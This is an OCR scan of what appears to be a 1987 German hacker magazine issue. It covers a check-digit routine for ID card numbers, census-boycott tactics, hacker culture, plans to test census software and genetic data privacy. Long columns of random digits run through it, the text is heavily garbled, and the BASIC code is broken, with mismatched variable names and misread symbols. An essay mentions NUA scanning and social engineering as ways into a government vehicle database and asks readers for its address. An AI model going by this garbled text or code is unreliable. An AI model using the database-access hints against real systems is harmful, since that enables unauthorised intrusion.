70263
75529
44483
37998
52516
64274
27466 39193
20030
5992 1
01612
54922
7B509
25770
25620
92622
8174 1
35966
29043 57290
03342
95260
64332
62779
33386
5664B
16277
25164
59563
07381
32328 62794
34907
63233
01910
59004
91644
99820
93150
56604
S29B3
07531
95251 01901
1 5738
34107
72530
27786
31964
15519
56532
44258
93070
21540
99149 93488
41675
09244
69829
46959
30801
91529
872 1 1
72556
76146
06680
82264 80016
84774
1 1853
34754
63964
479 10
1 4590
40905
B6298
74234
54424
37107 53907
77449
92069
49679
12874
06870
50489
58586
71747
55170
27618
38606 26133
1 3845
83000
98546
67757
57320
568 1 2
B8459
2054 1
75204
49338
26560 29760
67371
13200
33405
39220
00113
79630
09455
60689
70952
87091
27443 74704
72306
96977
16674
00169
84205
53040
33637
95376
20931
01416
92836 81902
55151
03657
45203
04024
32256
61352
7B369
51177
46377
21112
52399 73442
50569
53696
33386
39744
39662
53224
9B506
54995
77078
54499
69967 94686
44549
05987
88623
42818
99707
73327
61717
83923
93l 63
68892
30099 79312
7736 1
782 15
03494
65Q14
34558
89707
19425
36399
42499
92295
76351 48220
82698
95193
77275
47109
62953
74152
11151
36835
66803
31B25
20869 39849
64651
05320
06275
26023
26434
72870
39207
643 10
93923
98294
80793 32036
25094
43117
05958
41166
12054
52970
30236
47254
30123
81970
68416 14039
70198
37679
92966
69381
15137
32275
36 450
98389
32068
32823
76464 00429
53118
02328
03136
02057
249 1 7
65851
18063
03644
78250
98194
5581 5 30175
67173
613-32
23123
14965
50704
75102
54465
01172
06981
I 2509
96181 88159
304 16
90351
72115
55194
86685
08003
68532
2818.3
59338
35193
45807 27386
67335
39422
15219
60037
35625
27944
95158
294 18
87922
B4998
92086 80582
57492
796 10
82947
376 10
85263
98139
55990
06737
484 19
84443
63463 24496
84875
60233
64829
22443
75287
18462
45780
36192
62482
70419
79623 20900
21609
90235
98197
13991
47564
4992.6
26039
03381
30436
99413
49146 31409
3431 ?
38143
44182
32625
1 5097
48279
87779
9643?
64054
62531
52096 10.369
08337
07016
30899
70338
86778
227 1 3
83605
77297
76839
64243
78140 59271
45635
49061
3324 1
2561 1
90717
66394
65070
63304
30310
72085
10333 75051
01157
47704
52795
4661 8
5509ö
66613
56647
09711
17189
36106
87396 96552
1 2671
54688
34447
40160
70462
62156
80717
48137
95703
50354
02123 40784
98193
34321
78443
71436
98821
35596
70959
10259
06B17
01210
05627 88023
51930
33224
63620
02353
71853
37435
69652
20005
74501
5S539 1
J4730 41995
77770
93503
03117
34392
07321
13908
03293
63447
66041
69973 29725 03868
76966
40355
97273
55955
27734
90717
83793
42163
57071
62268 447.16 25607
93926
51787
70120
50054 1
51326 :
58354
40001
36323
13419
51246 6
5201 03059
21236
677 1 9
99149
07054 :
79778 05669
78533
58048
43252
78675 3985S 89443
96970
96409
96690
629SI 1
19432 47309
95876-
55236
V 7
« A l
'12Z_U
4 itVty •?
•7.4»« "2^
~ «
. Maschinenlesebarer Ausweis
|b 1.April müssen die autometengerechten Per- einer laufenden Zählnummer, die 10. Stelle ist
SOS beantragt werden. Zur besseren maschi- eine Prüfsumme, um Lesefehler zu erkennen
nellen Bürgerverarbeitung ist jetzt der Erts- oder gar zu beheben. Hier das Prüfsummen¬
wohnsitz in den ersten vier Stellen der Se- Rechenprogramm:
riennummer verdatet, Stelle 5 bis 9 entspricht
Prgniname$= "BPAPRFl" Erstellt anhand eines Dokujnentes der Dundesdruiikorei
Vers i ün$ ='* SV 1.01" ! "MERKBLATT fuet Personalauswt isbehoerden"
StainpS = '*198703271654"! 5.4 Detailvorschriften
CopyrightS="wau" ! Regeln fuer das Errechnen der Pruefziffer
Seriennuinraerlaenge = 9 ! Stelle i..4: Behoerdenkennzahl, 5..9: lfde. Rr.
' Diese S ta*ndard is i erung automatisiert Zugriff ueber Behoerde am Hauptwohnurt
Dim Produkt(Seriennummerlaenge)
Ser iennusumer § = " 270752123 " I Test-Mus ter nummer, deren Pruefziffer 7 ist
Faktorschluessel$="73173i731'' Faktorenfolge zur Pruefziffernberechnung
Fehlec=False ! kein Fehler bei der Eingabe
Print "BundesPersonalAusweisPraefziffetnberechnutig "
Print "Programm "; Prgmname " Version "; Ver s i onC; Da tumze i t gt uppe : ";Staiiip$
Do J Ewige Schleife
Input "Maschinenlesbare Ausweisnummet ohne Pruefziffer: ", Seriennumme tS
Exlt l£ Len(Seriennuinmet$)=0 ! Abtaruchbedingung Leereingabe
Gosub Eingabepruefung —
ff Not Fehler / A
Gosub Errechne_pruefZiffer / \
Print "Gefundene Pruefziffer ist: Prue f z i ff er [ \
Endif
Loop \ /
End
Procedure Eingabepruefung
l£ LenfSerlennummer$)OSeriennummerlaenge ! Eingabepruefung Laenge
Print "Fehler - falsche SeriennummernlaengeJ (Abbruch mit Leereingabe)"
Print Seriennummer $
Fehler=True
Endif
For I-l To Serlennuminerlaenge Eingabepruefung Ziffern
I£ MidS(SeriennummerS,I,l)<"0" Ot Mid$ (Ser i ennuminer $, 1,1) >"9 "
Print "Fehler - andere Eingabe als Ziffer! (Abbruch mit Leereingabe)"
Fehlet=Ttue
Endif
Next I
Return
Procedure Errechne^pruefziffer ! Die folgenden "Zitate" aus o.a. Dkument.
• "Die Endziffer der Seriennummer iat die Pruefziffer, die auf der
' Basis von Modul 10" (richtig: "modulo 10") wie folgt errechnet wird:"
Gosub Stufel ! "Multiplizieren jeder Ziffer der Bohoerdenkennzahl und der
' laufenden Nummer, beginnend mit der erster» Ziffer der Behoerdenkennzahl
’ mit den Faktoren 731731731"
Gosub Stu£e2 ! "Addieren der Einzelprodukte"
Gosub Stufe3 ! "Dividieren der Summe durch 10 (Modul)"
Gosub Stufe4 ! "Verbleibt bei dieser Division ein Rest, so ist dieser die
Return ! pruefziffer, verbleibt kein Rest, so lautet die Pruefziffer 0."
Procedure Stufel ! Ziffernweise Multiplikation 3 er iennunimer*Dehoerdenkenrizahl
For 1=1 To Seriennummerlaenge
Produkt(I)=Val{Mid$(SeriennummerS,1,1))*Va1(Mid$(Schluesselfaktur $, 1,1))
Next I
Return
I
Procedure Stu£e2 I Addieren der Einzelprodukte
Summe=0
For 1=1 To Ser lennunimerlaenge
Add Summe,ProduktCI)
Next I
Return
Procedure Stu£e3 ! Dividiere die Summe durch 10 ohne Rest
Zehntel_ohne_rest=Int(Summe/lO)
Return
Procedure Stu£e4 I Pruefziffer ist der bei der Division verbleibende Rest
prue£zl££er = Sunime-Zehntel_ohne_rest‘10
I Return
,S)ie ^aten^cl^leuber
ds-Red. Hamburgs Volkszählungsiniliativcn haben
am 20. März ihr Konzept zur endgültigen Verhinde¬
rung der„geplanten staatlichen totalen Erfassung be¬
kanntgegeben. Danach soll es zumindest in Hamburg
ausschließlich einen "harten” Boykott" geben. Von
verdeckten "weichen" Widerstandsformen raten die
Initiativen wegen der rechtlichen Konsequenzen für
den einzelnen ab.
Die VoIkszähJungsiniliativen empfehlen ein Drei¬
phasenkonzept anläßlich der geplanten Volkszäh¬
mung ’87":
1. Annahme des Bogens an der Haustür und Mittei¬
lung, daß er dem Statischen Landesamt zurückge¬
schickt wird ("Jaja, keine Zeit jetzt").
2. Eigenhändige Anonymisierung durch Umgestal¬
tung der Ordnungsnummer zum Chaosloch im
Volkszähmungsbogen mit scherenartigen Werkzeu-
gen.
3. Wciterleitung der so anomynisierten Unterlagen an
die nachbarschaftlichen Initiativen oder VoBo-
Sammelstellen.
Der dritte Punkt dient der Information der Öffent¬
lichkeit über die Breite des Widerstandes in anonymi¬
sierter Form.
Adressen und Treffs örtlicher Initiativen können, wie
bei der letzten verhinderten Zähmung, u. a. über
Stadtzeitungen und - teilweise - über Datenschutz-
beaufiragle und Parteien erfragt werden.
Angesichts der vielen Werbemillionen für die Indula-
Neuverdatung fordern Spötter anstelle der Volks¬
zähmung mit ihren Wcrbcmillionenmark die allge¬
meine Volkszählung *87 dieser Millionen und werfen
Zählungsfan Heino ("deutscher Sänger für deutsche
Zählung") vor, er hätte nur Angst, versehentlich im
polizeilichen Fahndungsraster mit einem von ihm
beklagten Doppelgänger von den Toten Hosen ver¬
wechselt zu werden.
Gloria von Thurn und Taxis, durch Familieniradition
dem Reichspostregal und so der Einführung der Da-
tenweilergabe an die Hoheit (werschreibl wann wem,
gegebenenfalls was?) verbunden, wird im Spiegel
zum Thema zitiert mit "Kriminelle Elemente besser
erfassen".
Der SPIEGEL zitiert als CCC-Ratschläge ein wei¬
ches Boykottkonzept; ein anderswo verdrucktes Zi¬
tat, das die Meinung im Chaos Computer Club nur
sehr verkürzt wiedergibt. wau
Formel NullEins:
Die Hacker-Charts
1 The Bitles
YELLOW SUBROUTINE
2 John TraVolt
EVERY NIGHT FEVER
3 Elvis Presley
IN THE GOTO
4 Talking Heads
STOP SENDING SENF
5 Scrolling Stones
GIMME PASSWORD
^te SJateni^cl^rcuber
6 VAX Pistols
GOD SAVE THE PIN
7 Think Floyd
DARK SIDE OF THE CPU
8 Simon & Furunkel
BIT OVER TROUBLED DATA
9 Tina Turner
NETWORK CITY LIMIT
A Low Read
WALK ON THE FILE SIDE
53537
0S76I
38939
63917
79574
54016
13722
36187
89365
26053
81558
41587
18692
55386
06164
77983
40254
35128
43961
29460
35291
33259
42794
90433
72990
85731
58029
09586
31382
68329
14771
16396
33709
24003
16894
53636
06064
58459
25126
99465
5724B
39196
■56420
97526
85082
30754
42545
99376
91704
19777
80085
36273
09417
10163
43490
76964
23722
29435
23661
25572
50881
47792
23151
97477
80605
69672
Informationelle
Selbstbestimmung
leichtgemacht
(Hamburg,CRD) Seltsames widerfuhr einem Aktivi¬
sten, der beim Hamburgischen Statistischen Landes¬
amt um Informationsmaterial zur Volkszähmung
nachsuchle. Als er das gwönschte Material nebst
Tbrdröcker schon in der Hand hielt, wurde er von der
HaSlaLA - Dame zwecks Adressabgabe zuröckbeor-
dert. Als unser Protagonist nach erfolgter Datenab¬
gabe bemerkte, daß seine Daten auf einen Stapel
gleichartiger Formulare gepackt wurden, fragte er si¬
cherheitshalber nach dem Verwendungszweck und
erhielt den lakonischen Bescheid, der Rechnungshö¬
fe verlange diese Angaben. Angesichts der Unwahr¬
scheinlichkeit dieser Aussage und des geringen Wer¬
tes der erhaltenen Infos, auch in materieller Hinsicht,
wurde der Datenerfassungsbeleg in Privatbesitz
zurckgefhrt, was zu heftigem Protest der Dame und
Herbeiruf eines Vorgesetzen derselben führte. Dieser
bezog sich ebenfalls auf den Rechnungshof und ver¬
langte entweder den DEB oder das Infomaterial zu¬
rück, beides wurde verweigert und der Beleg sicher¬
heitshalber zerrissen in die Jackentasche versenkt.
Aber selbst derart verstümmelte Daten wecken das
Interesse eines Statistikers, und das Angebot des
Vorgesetzten, man könne die Fetzen gerne im amtsei¬
genen Papierkorb endlagern, erschien wie die verge¬
blichen Versuche eines Vampirs, an die letzte unver-
seuchte Blutkonserve zu gelangen. Nachdem es
schliesslich gelungen war, mit dem Informationsma¬
terial und ohne Zurücklassung personenbezogener
Daten das HaStaLAzu verlassen, bestätigteein Kon-
trollanruf beim Rechnungshof die Handlungsweise;
Dort wusste man nämlich nichts von eine derartigen
Anweisung.
Bis zur Stunde konnte nicht zweifelsfrei geklärt wer¬
den, wozu die Daten nun wirklich benötigt werden.
goblin
splitlW.doc 198703201750 g 27.15:30 wau
Volkszähmung
Kein Datenschutzkonzept - Hacker wollen
Volkszählungssottware testen
Hamburg - Sogenannte Virenprogramme, die
sich automatisch in Computersystemen ver¬
vielfältigen und dort Datenbestände und Pro¬
gramme verändern und zerstören können,
standen im Mittelpunkt des letzten Hacker¬
kongresses (CCC) in Hamburg. Seitdem kur¬
siert das Gerücht, Hacker wollten solche Com¬
puterviren in die Rechenzentren der statisti¬
schen Landesämter einschleusen und damit
die Auswertung der Volkszählungsdaten lahm¬
legen. Doch solchen Vorhaben fehlt bis auf
weiteres die Grundlage, so jedenfalls war aus
der bayrischen Hackerszene zu erfahren. Bis¬
lang läge den verantwortlichen Rechenzentren
noch kein funktionsfähiges Auswertungspro¬
gramm vor. Das Statistische Bundesamt hat für
Herbst diesen Jahres lediglich den Entwurf
eines Datenverarbeitungskonzeptes ange¬
kündigt. Fachleute vermuten, ein den Anfor¬
derungen genügendes Computerprogramm
werde es als Rohversion frühestens im Früh¬
jahr 1988 geben. “Ohne fertige Software“, so
Thomas Vogler von der Bayrischen Hackerpost
(B.H.P.), “macht der Einsatz von Viren nicht
allzuviel Sinn.“
Die B.H.P. ist so etwas wie das südliche Ge¬
genstück zum Hamburger “Chaos Computer
Club“. Bereits 1985 entstand auf Initiative der
bayrischen Hacker das “Bayrische Forum
Mensch und Computer e.V.“. Ein Verein, der
sich den Wechselwirkungen zwischen Mensch
und Technik widmet. Das Spektrum der The¬
men reicht von sozialen Folgeabschätzungen
des Computereinsatzes bis zur computerge¬
rechten Vollwerternährung. Das Verhältnis zwi¬
schen Mensch und Technik war auch das Motiv
der B.H.P.-Berichterstattung über das Reak¬
torunglück in Tschernobyl. Innerhalb weniger
Tage hatte die bayrische Hackerszene einen
Informationsdienst mit ersten Meßergebnis¬
sen, Verhaltenstips, Umrechnungstabellen der
verschiedenen Strahlenwerte und Hinter¬
grundberichten aufgebaut. Mittels internatio¬
naler Computemetze wurden Korresponden¬
ten angeschrieben und eingehende Meldungen
verbreitet. Ein Trumpf, der auch gerne gegen-
ueber den als computerfeindlich geltenden
Grünen ausgespielt wird.
Illlllllllllljjlll
Jetzt wollen sich die Bayern der Volkszählung
widmen. Nach der Devise “Konkurrenz belebt
das Geschäft“, haben sie Anfang April die bun¬
desdeutsche Hackerszene zu einem Wettstreit
mit den Entwicklern der Volkszählungssottware
aufgerufen. Die Grundlage bilden neben einer
gewissen Anzahl per Computer zusammen¬
gestellter Pseudo-Bundesbürger freiwillig ab¬
gegebene Daten die nach dem gleichem Raster
wie das der Volkszählung 1987 erhoben wur¬
den. Für den Umgang mit diesen Daten haben
sich die Akteure notarieller Aufsicht unterstellt.
Erklärtes Ziel: Nach allen Regeln der Kunst soll
aus den Daten “rausgeholt werden, was raus¬
zuholen ist“. Mit Rückgriff auf öffentlich zu¬
gänglichen Daten soll ein möglichst vollstän¬
diges Persönlichkeitsabbild des Menschen im
Rechner enstehen. Ob dies gelingt, bleibt da¬
hingestellt. Auf alle Fälle rechnet das “Bayri¬
sche Forum Mensch und Computere.V."damit,
daß durch diese Aktion Sicherheitsfragen zu¬
tage gefördert werden, die in bisherigen Da¬
tenschutzkonzepten nicht berücksichtigt wur¬
den.
Am 25.April, also einen Monat vordem Stichtag
der offiziellen Volkszählung, wollen die 'le¬
bensbejahenden DFÜ - Benutzer'von der BHP
mit ihrer “Aktion Kontrollzählung“ beginnen.
Gegen Rückporto versendet das “Bayrische
Forum Mensch und Computer e.V.“ durchnu¬
merierte Erfassungsbögen, auf denen derselbe
Datensatz abgefragt wird wie bei der “Volks¬
zählung 1987". Allerdings darf bei der Kon¬
trollzählung geschummelt werden, - aber nicht
zu arg, wie Vogler warnt. “Auch wir führen eine
Plausibilitätskontrolle durch und werden zei¬
gen, wie gut das funktionieren kann“. Unter
Einhaltung der gesetzlichen Datenschutzbe¬
stimmungen, über die ein Notar wacht, wollen
die Bayern die Daten ihrer Kontrollzählung ein¬
geben und verarbeiten. Gegen Teilnahmege¬
bühr wird Einblick in die persönliche Date¬
nauswertung gewährt. Daß gesetzliche Rege¬
lungen den technischen Möglichkeiten immer
um einige Jahre hinterhinken, wird von nie¬
mandem ernsthaft bestritten. “Doch was das
bedeutet, glauben die Leute erst, wenn man es
praktisch demonstriert“, meint Vogler. Und
genau das hat die Hackerszene vor.
Von einer ganz anderen Ecke wurde bereits
Ende letzten Jahres die Datensicherheit der
Volkszählung auf Herz und Nieren geprüft. Der
Hamburger Informatikprofessor Klaus Brunn¬
sfein und seine Mitarbeiterin Marion Fischer-
Hübner traten mit 100 000 Spieldaten den
^aten^cJ^leuber
Nachweis an, daß mit relativ wenig Aufwand
aus einer schier unüberschaubaren Daten¬
menge Einzelpersonen herausgefiltert werden
können. Maximal 10 von den insgesamt 33
Einzeldaten aus der“Volkszählung 1987“seien
dazu notwendig.
Die jederzeit mögliche Re-Identifizierung be¬
reits anonymisierter Daten halten die Bayern
jedoch für ein vergleichsweise harmloses Pro¬
blem. Weit ernster nimmt man die sich ab¬
zeichnende technische Möglichkeit, aus dem
“persönlichen Datengerippe“ jedes Einzelnen
in Verbindung mit anderen Verwaltungsdaten
allmählich “individuelle“ Persönlichkeitsbilder
aufzubauen. "Nimmtman nurgenügend andere
Daten und Erkenntnisse zu Hilfe, kann letztlich
ein vollständiges elektronisches Gegenstück
des einzelnen Menschen im Rechner simuliert
werden“, erklärt Vogler seine Bedenken. “Ein
entsprechend programmiertes Expertensy¬
stem, gefüttert mit Erkenntnissen etwa aus der
Verhaltenspsychologie, könnte den Menschen
scheinbar berechenbar machen." Wie dem
auch sei. Jedenfalls wollen die Hacker der Of-
tentlichkeit, im Gegensatz zu den statistischen
Landesämtern, einen regelmäßigen Tätig¬
keitsbericht über den Stand ihrer Sottwa-
reentwicklung präsentieren.
Von der “Hacksicherheit“ der Rechenzentren ist
Vogler nicht überzeugt: “das Gesetz regelt die
Vorgänge des Kopierens und Löschens so, als
wären Magnetplattenspeicher und simple Ak¬
tenordner ein und dasselbe. Irgendwann
kommt jemand an die Daten, für den sie nicht
bestimmt sind.“ Ob denn die Hackerszene die
Volkszählung boykottieren werde? "Jeder soll
tun, was er für richtig hält - und wer sich zählen
lässt, gehört regislnert “, meint Vogler viel¬
deutig. Er selbst will den Erhebungsbogen ord¬
nungsgemäß ausfüllen, ihn allerdings bei
einem Notar hinterlegen und mit dessen Be¬
glaubigung eine einstweilige Verfügung erwir¬
ken. “Erst möchte ich geklärt sehen, ob ich
angesichts der offensichtlichen gesetzgeberi¬
schen Flüchtigkeitsfehler verpflichtet bin, den
statistischen Ämtern persönliche Daten zum
Zwecke der Softwareentwicklung zu überlas¬
sen, ohne daß geklärt wäre, was sie program¬
mieren dürfen und was nicht.“
jwi
volksza20.ds 198704161755
53801 7:5ß7 7,1360 1462i 59278 77846
58306 50050 73084 42115 29697 52199
Auffällig ist bei uns
das Unauffällige.
08740 19660 90665 130.35 16501 79250
46195 01366 59543 66327 12549 63990
05491 44200 01457 4760B 19302 21206
60243 30096 41270 48943 90397 17719
51806 99036 99860 66365 83232 27870
93765 02260 14929 10115 17177 63594
46020 23249 30028 04013 67723 91023
B0978 66605 65118 32600 43638 50881
71572 38669 84224 22010 24950 55183
16948 03221 00251 54264 94639 81287
36776 58927 68816 35983 12477 88652
01411 74110 91360 11649 95076 62907
79436 46005 05194 19985 60162 64790
76153 21038 72755 71269 92518 27568
79B93 02761 76114 61625 49356 49590
37980 45838 18232 33686 12016 24373
65698 46703 78585 33052 75833 33793
99075 21660 69238 05336 98879 56513
72855 93883 49989 47074 16181 55012
53970 64648 17194 670B3 48197 21448
88987 90676 50379 59036 69672 49499
25452 790,33 72963 61626 58976 03949
85767 41397 35944 10237 44329 70935
54779 82629 61459 1442V 36451 42861
71585 87339 74679 13975 71211 95618
73357 83644 75844 34235 55501 05002
56114 92391 51839 30994 63428 41393
60803 3-3091 66281 331 15 0-3715 28496
70597 41625 62323 60921 69075 15017
77253 87402 56425 .34703 79089 13729
17228 2361I 51591 56837 25241 63077
22544 06.3.37 37593 10598 26760 94420
32619 24235 31701 97817 72960 23541
30606 721.36 04600 03S96 61093 61709
Aus für “Hacker“?
51414 17185 77701 A180Ä 04443 43681
Dieser Essay ergab sich spontan aus einer Diskussion
im ”HackerInfo’'-Brett der CLINCH-Mailbox. Hier¬
bei wurden u.a. rechtliche Aspekte der abgelegten
Hackerinformationen diskutiert:
Nehmen wir also an, ein Freund namens Willy hat er¬
fahren, daß das Kraftfahrbundesamt in Flensburg
einen Abfragecomputer für die berüchtigte Daten¬
bank (die mit den vielen.) *’an das Netz ge¬
hängt" hat. Also fragt er seinen schon auf den Netzen
erprobten Freund Schorsch, wie man denn vielleicht
an die Nua dieses Rechners herankommen könnte.
Schorsch als alter Freund legt eine entsprechende
Antwort im Brett ab (Nuascanner, "social enginee-
ring" usw.), die der Auslöser für obige Diskussion
wird. Sind nun Schorschis Informationen als "Beihil¬
fe zu einer Straftat" aufzufassen oder, wie es in der
Absicht von Schorsch lag, als einfacher Gedanken-
und Erfahrungsaustausch zwischen Freunden, Kol¬
legen usw.? Hierbei wurde nun allen "Hackern" ein
sträflicher Leichtsinn im Umgang mit den Informa¬
tionen vorgeworfen und nahezu das gesamte Hac¬
kerwesen in Frage gestellt. Denn sind Hacker die
Leute, die dann tatsächlich auf selbstverständlich
verbotene Weise sich Zutritt zu diesen Rechnern ver¬
schaffen? Hierbei muß klargestellt werden, was denn
ein Hacker nun eigentlich ist.
Mancher mag sich unter einem "Hacker" ein Männ¬
lein mit einer überdimensionalen, blutbefleckten Axt
vorstellen, der am Flughafen auf besetzte Terminals
wartet um zuzuschlagen; manch anderer ein kaum als
Mensch zu ideniinzierendes Individuum mit langen,
fettigen Haaren, glasigen Augen, kaffeebeflecktem
Compulerpapier unterm Arm und Ringen unter den
Augen, wie sie sonst ein frisch gebackener Ehemann
nach der Hochzeitsnacht an seiner Angetrauten zu
finden hofft. Aber was sind denn Hacker nun?
In Deutschland ist "Hacker" der pauschale Oberbe¬
griff für all das, wofür sich die Amerikaner (jaja,
wieder ein typischer Fall der ewigen Ein-Amerikani-
sierung) jahrelang fein abgegrenzte Begriffe definiert
haben: den Hacker, den Phreak, den Crackerund den
Crasher.
HACKER • Der wohl älteste Begriff, gibt es, seil dem
es Computer gibt, und zwar nicht nur PC’s, sondern
auch die alten Kleiderschränke mit dem Düsenjet¬
sound. Der Autor hat vor 8 Jahren die ersten echten
Hacker kennengclernt, im Rechenzentrum einer gro¬
ßen Firma, offiziell als Operateure beschäftigt. Jene
welche hatten eine interne Wette laufen, wer es als er¬
ster schafft, das Betriebssystem so zu patchen, daß je
nach Wochentag bestimmte Meldungen auf der Ma-
sterconsole erscheinen wie "Sonntag ist Sabbat -
please logoff’. Dafür wurde auch bis spät in die
Nacht "gearbeite".
Oder die Geschichte aus den USA, wo auf einem
IBM-Kongreß ein inoffizieller Wettbewerb lief, wer
das unverständlichste APL- Programm schreiben
konnte (gewonnen hat übrigens ein Herr, der sein ei¬
genes Programm nicht verstanden, geschweige denn
wiedererkanni hatte, nachdem einige Scherzbolde
seinen Copyright- Vermerk entfernt hatten).
546^4
19494
40053 31ö0a 77531
22975 59931 40119
06553 93300 46932
4.3174
98693
90115
44081
31483
744 1 4
Hacker waren bzw. sind also User, die so vernarrt in
ihre Kiste sind, daß sie sich praktisch mit ihr "verhei¬
raten". Der Autor hat seinen ersten Weg zum Hacker-
tum in seiner Schulzeit im zarten Alter von 16 ge¬
macht, als er an dem Schulcomputer (ein aller HP-
Rechnermit SkByte, 1-Zeilen LED-Display) versuch¬
te, eine Folge von BASIC-Befehlen zu einem sinnvol¬
len Programm zu bewegen. Irgendwelche Hinter¬
grundgeräusche wurden verdrängt, inklusive dem
Schlüsselgeklapper des Hausmeisters, als er die
Schulräume am Abend verschloß. Nun mußte der
Autor notgedrungen die Nacht mit dem Rechner ver¬
bringen. .. nicht sehr erotisch, aber ergiebig; am
naechsten Tag lief das Programm zwar immer noch
nicht, aber dafuer konnte man nun auf die Assem¬
blerroutinen (es gab kein Pik oder Poke) zugreifen
und das Display blinken oder ganz verschwinden las¬
sen. Dann gings richtig los: tagelang bei "Quelle" vor
dem PET2001 stehen und "rumpoken", bis die Trei¬
ber rauchten, den Pförtner eines Rechenzentrums
nerven usw.
Heutzutage ist es einfacher geworden: man kaufe sich
eine Daientoilelte, einen Komadore und dann kann
man sich dutzende verschiedener Großrechner an
seinen Schreibtisch holen. Vorbei die Zeit, als man
noch zu den Operatorkonsolen schleichen mußte, um
sich armen Programmierer mehr Privilegien geben zu
können (und dann mit Fußtritten oder Bemerkungen
wie "geh zurück an deinen TI-59" rausgeworfen zu
werden). Heute sind es die Operateure, die verzwei¬
felt den Datex-Hacker bitten, doch bitte auch ihm ein
paar Zugriffsrechte zu lassen ("please, give me back
my Privileges"). Hacken wird zum Breitensport, zu
einer modernen Form der Freizeitbeschäftigung, dem
"Datenreisen".
Die eigentlichen Hacker, die durch ihr Arbeitsver-
hälinis zwar können, aber nicht dürfen, werden zu
Datenreisenden, die nun anonym ihr Wissenspoten¬
tial so richtig auskosten können. Homecomputer¬
freunde können sich im Rahmen ihrer bescheidenen
Möglichkeiten auch Kenntnisse von Großrechnern
aneignen. Aber kaum hat dieser neue Sport an Attrak¬
tivität gewonnen, wird er ins kriminelle Abseits ge¬
drängt. Die neuen Hackergeselze aber betreffen nicht
nur den Datenreisenden, sondern auch die "alten"
Hacker. Eine mit Kaugummi verklebte Lochkarte
wird zum Präzedenzfall, Mailboxen zu verschwöreri¬
schen "Underground- Medien".
Und dann wäre da Ja noch die neue Gebührenpolitik
des Gilb in Bezug auf Dalex-P zu nennen, noch viel
wirkungsvoller als die neuen Gesetze. Wer kann sich
das denn ab April noch leisten? Das Datenreisen,
kaum im Kommen, wird sang-und klanglos im NIL
verschwinden. Auch für kommerzielle Mailboxbe-
ireiber brechen harte Zeiten an, denn die Online-Zci-
ten werden sich verringern und von 10.- DM im Mo¬
nat kann keinerauf Dauer existieren. Traurig, traurig,
die CeBit wird wohl die letzten "Hacksessions" mit
sich bringen, denn wenn etwas Geld kostet, dann
macht es erfahrungsgemäß nicht mehr so viel Spaß.
Es wird Zeit, daß auch in unseren Cornflake.spac-
kungen kleine Plastikspielzeuge gefunden werden
(vielleicht gleich mit FTZ-Nummer?)!
Übrigens: falls einer die Nua der in der Einleitung
genannten Datenbank hat (lechz!), möge ersieh doch
bitte bei uns melden, no pasaran! FRIMP:-)
S>le S>atcn^ cl^ Ccubcr
Feature:
Der genetisch gläserne Mensch
Erbsubstanz in der Rasterfahndung
75431 3<?9'?7 22170 38044 17092 39457
Hamburg (ds) - Als die Kostenexplosion im Gesund¬
heitswesen 1978 öffentliches Thema wurde, betrugen
die Gesamtausgaben für Gesundheit über 165 Mil¬
liarden Mark oder rund 20 Prozent des verfügbaren
Einkommens privater Haushalte. "Koslendämp-
fung" wurde zum gängigen Schlagwort der Diskus¬
sion, verbunden mit kontroversen Auseinanderset¬
zungen über Ausgestaltung und Konsequenzen des
beabsichtigten Sparkurses. Wesentliche Vorausset¬
zung der angepeilten Steuerungsversuche war die
"Verbesserung der Datcnlage", heißt, die Kassen, die
sich zudem mit einem wachsenden Anteil an chroni¬
schen, sozial- und umweltbedingten Krankheiten
konfrontiert sahen, konstatierten einen wesentlich
erhöhten Bedarf an Sozial- und Gesundheitsdaten.
Geplant’wurde ein maschinenlesbarer Versicherte¬
nausweis der mit ebenfalls maschinenlesbaren For¬
mularen gekoppelt werden sollte. Ein neu einzufüh¬
render Paragraph 319 der Reichsversicherungsord-
nung(RVO),soiltedie rechtlichen Grundlagen dieses
sogenannten "Transparenzprojektes" .schaffen. Nach
einer Felderprobung in Schleswig-Holstein wurde
das Vorhaben jedoch zunächst verworfen. Allerdings
nicht aus daienschuizrechtlichen, sondern vor allem
wegen ökonomischer Bedenken.
Gen-jAnaiyse_öffenUicliej:_Gesundheitsvorsorße
42434 569S4 40187 33128 ' r0i07 94512
Allgemein stellt sich die Frage, wer in welchem Um¬
fang Daten der öffentlichen Gesundheitsfürsorge
oder kassenärztlichen Abrechnung erheben und of¬
fenbaren darf. Wer, zu welchen Zweck Zugriff be¬
kommt - und, unabhängig von solchen formalen Kri¬
terien, welche Schlussfolgerungen aus dem Datenma¬
terial von wem zu welchem Zweck gezogen werden.
Kritiker versichern, dass beispielsweise in der Ham¬
burger Gesundheilsbehörde und dem Tumorzentrum
in Hamburg Eppendorf eine Behindertenkartei ge¬
führt werde, in der ca. 2000 Menschen erfasst sind.
Erkennbare Fehlbildungen bei der Geburt werden
automatisch beim Statistischen Bundesamt in Wies¬
baden ausgewertet. Aus anderen Unterlagen gehe
hervor, daß in Europa alle Mißbildungen nach ein¬
heitlichen Kriterien erfasst werden sollen.
Nach Auffassung von Prof. Dr. Bernd Klees, werde
eine umfassende prä- und postnatale genetische An¬
alyse in naher Zukunft die Grundlage individueller
Gen-Karten und zentralisierter Genkarteien liefern,
die die Mehrzahl unserer Bevölkerung einer totalen
Kontrolle unterwerfen werde. "Das Konstrukt der
'informationeilen Selbstbestimmung”', so Klees,
"wird dann nur noch eine hilflose Verteidigungslinie
sein. Die 'Volkssählungsdebatte' wäre gegen über den
'Gen- Debatte' nur ein gleichsam harmloses Prälu¬
dium". Die bayrischen Vorstöße zur AIDS- Meldep¬
flicht, geben einen Vorgeschmack auf künftige Ent¬
wicklungen.
Kosten-Nutzen-Rechnungen
mit Daten über Erbgu t?
90962 71662 26074 C71 87 4'9975 35921
Der dahinter stehende Wunsch nach detaillierten In¬
formationssystemen ist damit aber nicht vom Tisch.
Im' Gegenteil! Dem Kassenarzt werden unter Beru¬
fung auf Paragraph 368 RVO bereits über 80 vorge¬
druckte Bescheinigungen und detaillerte Berichte
über seine Patienten abverlangt, was im Einzelfall
bedeuten kann, daß der Patient vor der Alternative
sieht, entweder auf die Wahrung seiner Intimdaten
oder auf wirksame Hilfezu verzichten.
Die Forderung nach mehr Effektivität und Effizienz
hat auch im Gesundheitswesen zunehmend Kosten-
Nutzen- Rechnungen aufkommen lassen. Der Prä-
ventivmedizin wurde wachsende Bedeutung beige¬
messen. Der steigende Anteil umweltbedinger
Krankheiten hat zudem eine neue medizinische Dis¬
ziplin auf den Plan gerufen, die sogenannte ökogene-
tik. Sie untersucht Wechselwirkungen zwischen Erbe
und Umwelt, insbesondere Wirkungen potentiell
erbgutverändernder Stoffe auf die genetische Konsti¬
